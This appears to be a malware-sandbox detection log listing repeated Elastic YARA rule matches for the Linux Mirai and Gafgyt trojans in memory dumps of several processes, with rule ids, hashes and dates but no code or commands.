Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6445.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6443.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6444.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6530.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6597.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6599.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6563.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6564.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6593.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
